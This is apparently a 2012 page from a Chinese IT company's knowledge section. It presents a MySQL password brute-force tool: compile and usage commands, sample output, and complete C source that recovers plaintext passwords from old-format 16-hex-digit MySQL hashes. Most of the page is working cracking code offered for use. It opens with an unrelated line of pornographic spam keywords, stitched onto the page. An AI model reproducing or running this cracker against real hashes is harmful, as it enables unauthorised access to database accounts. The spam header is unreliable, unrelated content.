欧美激情网,国产欧美亚洲高清,欧美屁股xxxxx,欧美群妇大交群,欧美人与物ⅴideos另类,区二区三区在线 | 欧洲

知識學堂
  • ·聯(lián)系電話:+86.023-75585550
  • ·聯(lián)系傳真:+86.023-75585550
  • ·24小時手機:13896886023
  • ·QQ 咨 詢:361652718 513960520
當前位置 > 首頁 > 知識學堂 > 常見技術(shù)問題
MySQL密碼高速暴力計算工具
更新時間:2012-04-14 | 發(fā)布人:本站 | 點擊率:299
代碼:C language under unix
編譯:$ gcc -O2 -fomit-frame-pointer mysqlfast.c -o mysqlfast
用法:$ mysqlfast 6294b50f67eda209
 
/*
 
Hash: 6294b50f67eda209
Trying length 3
Trying length 4
Found pass: barf
 
*/
 
 /* This program is public domain. Share and enjoy.
 
* The MySQL password hash function could be strengthened considerably
 
* by:
 
* - making two passes over the password
 
* - using a bitwise rotate instead of a left shift
 
* - causing more arithmetic overflows
 
*/
 
#include <stdio.h>
 
 
typedef unsigned long u32;
 
 
/* Allowable characters in password; 33-126 is printable ascii */
 
#define MIN_CHAR 33
 
#define MAX_CHAR 126
 
 
/* Maximum length of password */
 
#define MAX_LEN 12
 
 
#define MASK 0x7fffffffL
 
 
int crack0(int stop, u32 targ1, u32 targ2, int *pass_ary)
 
{
 
  int i, c;
 
  u32 d, e, sum, step, diff, div, xor1, xor2, state1, state2;
 
  u32 newstate1, newstate2, newstate3;
 
  u32 state1_ary[MAX_LEN-2], state2_ary[MAX_LEN-2];
 
  u32 xor_ary[MAX_LEN-3], step_ary[MAX_LEN-3];
 
  i = -1;
 
  sum = 7;
 
  state1_ary[0] = 1345345333L;
 
  state2_ary[0] = 0x12345671L;
 
 
  while (1) {
 
    while (i < stop) {
 
      i++;
 
      pass_ary[i] = MIN_CHAR;
 
      step_ary[i] = (state1_ary[i] & 0x3f) + sum;
 
      xor_ary[i] = step_ary[i]*MIN_CHAR + (state1_ary[i] << 8);
 
      sum += MIN_CHAR;
 
      state1_ary[i+1] = state1_ary[i] ^ xor_ary[i];
 
      state2_ary[i+1] = state2_ary[i]
 
        + ((state2_ary[i] << 8) ^ state1_ary[i+1]);
 
    }
 
 
    state1 = state1_ary[i+1];
 
    state2 = state2_ary[i+1];
 
    step = (state1 & 0x3f) + sum;
 
    xor1 = step*MIN_CHAR + (state1 << 8);
 
    xor2 = (state2 << 8) ^ state1;
 
 
    for (c = MIN_CHAR; c <= MAX_CHAR; c++, xor1 += step) {
 
      newstate2 = state2 + (xor1 ^ xor2);
 
      newstate1 = state1 ^ xor1;
 
 
      newstate3 = (targ2 - newstate2) ^ (newstate2 << 8);
 
      div = (newstate1 & 0x3f) + sum + c;
 
      diff = ((newstate3 ^ newstate1) - (newstate1 << 8)) & MASK;
 
      if (diff % div != 0) continue;
 
      d = diff / div;
 
      if (d < MIN_CHAR || d > MAX_CHAR) continue;
 
 
      div = (newstate3 & 0x3f) + sum + c + d;
 
      diff = ((targ1 ^ newstate3) - (newstate3 << 8)) & MASK;
 
      if (diff % div != 0) continue;
 
      e = diff / div;
 
      if (e < MIN_CHAR || e > MAX_CHAR) continue;
 
 
      pass_ary[i+1] = c;
 
      pass_ary[i+2] = d;
 
      pass_ary[i+3] = e;
 
      return 1;
 
    }
 
 
    while (i >= 0 && pass_ary[i] >= MAX_CHAR) {
 
      sum -= MAX_CHAR;
 
      i--;
 
    }if (i < 0) break;
 
    pass_ary[i]++;
 
    xor_ary[i] += step_ary[i];
 
    sum++;
 
    state1_ary[i+1] = state1_ary[i] ^ xor_ary[i];
 
    state2_ary[i+1] = state2_ary[i]
 
      + ((state2_ary[i] << 8) ^ state1_ary[i+1]);
 
  }
 
 
  return 0;
 
}
 
 
void crack(char *hash)
 
{
 
  int i, len;
 
  u32 targ1, targ2, targ3;
 
  int pass[MAX_LEN];
 
 
  if ( sscanf(hash, "%8lx%lx", &targ1, &targ2) != 2 ) {
 
    printf("Invalid password hash: %s\n", hash);
 
    return;
 
  }
 
  printf("Hash: %08lx%08lx\n", targ1, targ2);
 
  targ3 = targ2 - targ1;
 
  targ3 = targ2 - ((targ3 << 8) ^ targ1);
 
  targ3 = targ2 - ((targ3 << 8) ^ targ1);
 
  targ3 = targ2 - ((targ3 << 8) ^ targ1);
 
 
  for (len = 3; len <= MAX_LEN; len++) {
 
    printf("Trying length %d\n", len);
 
    if ( crack0(len-4, targ1, targ3, pass) ) {
 
      printf("Found pass: ");
 
      for (i = 0; i < len; i++)
 
        putchar(pass[i]);
 
      putchar('\n');
 
      break;
 
    }
 
  }
 
  if (len > MAX_LEN)
 
    printf("Pass not found\n");
 
}
 
 
int main(int argc, char *argv[])
 
{
 
  int i;
 
  if (argc <= 1)
 
    printf("usage: %s hash\n", argv[0]);
 
  for (i = 1; i < argc; i++)
 
    crack(argv[i]);
 
  return 0;
 
}
相關(guān)文章